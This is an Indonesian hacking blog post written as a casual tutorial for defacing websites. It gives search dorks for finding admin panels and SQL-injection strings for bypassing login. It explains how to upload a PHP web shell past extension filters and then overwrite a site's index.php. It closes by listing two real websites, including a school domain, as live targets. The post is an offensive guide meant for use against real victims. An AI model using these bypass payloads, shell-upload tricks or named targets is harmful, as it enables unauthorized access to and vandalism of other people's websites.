Jumat, 21 September 2018

Deface dengan bypass + up shell + Live target

Your Ads Here

Deface dengan bypass + up shell + Live target
Your Ads Here

Assalamualaikum :*
Yoo wasaapp !
Di postingan pertama ini aku akan share deface poc bypass :'V
(Byypas opo cok !)
-byypas admin
-byypas SQL
-tak byypas ndasmu!
Intinya byypas ea qimak >:'v
Okok next :'v
Bahan - bahan nya :
-hp/pc
-kuota/Wi-Fi :'v
-Dork (di bawah :'v)
-shell backdoor (w pke mini) :'v
-u/p : ' or 1=1 limit 1 -- -+
-u/p : '="or'
Syarat  :
-kudu sabar ajg !

Okok Langsung lh
Dork :
inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
inurl:/admin site:in
inurl:/login site:il
inurl:/admin/login.php
Udah segitu aja😂
Kembangin ea :'v!

Pertama klean dorking
Lihat gambar!

[>Touch me!<]


Nh trus masukan user&pass ny
'="or'
Kalau ngk bisa '="or'
Ganti dgn  ' or 1=1 limit 1 -- -+

Liat gambar!

>[touched me<]
Tpi w itu bisa '="or'
:'V

Nh trus itu kn vuln jadi langsung ke dashboard admin :'V
Klo ngk vuln ngk ke dashboard lh kontol !

[>touched me<]

Nh lngsung cari tempat bwt up shell ny >:'v


Klo ini di sini
[<touched me <]

Trus pencet logo pensil itu :'v(edit)


Nh liat gambar,ada uploader ny >:'v
[>touched me<]


Tinggl upload shell :'v
Ext ny php,php5,php;.jpeg
Dll

Ni .php udh bisa
(Admin na mabok :'V)
 [>touched me<]

Akses shell ?
Liat ! >:'v
[>touched me<]
Nh tahan gambar yg rusak tu
jadi sprti ini
Trus pilih lihat gambar
Atau sejenis ny lh :'V

Done njg ! :'V

[>touched me<]

Trus ke public_html
[>ouched me<]
Nh tu ada beberapa subdomain,
Pilih satu"
Trus cari index.php
Nh terus edit ->lalu save
Dan
Touch-->  Dooor!

Live :
 - https://aryabhattours.com
 -http://gsc.nmc.ac.th/th/admin/admin_panal.php

Kalem ae gan :'v
Maaf bila ada ke salahan ny
Karena saiia msih nub :'(


Keep calm
And 
Fake a smile :')

Wassalamualaikum











Blog ini adalah tempat untuk penyedia berbagai macam tutorial, tips, dan info menarik lainnya. Admin berharap pengunjung dapat lebih mudah mencari apa yang di inginkan dan mendapatkan informasi yang menarik di blog ini.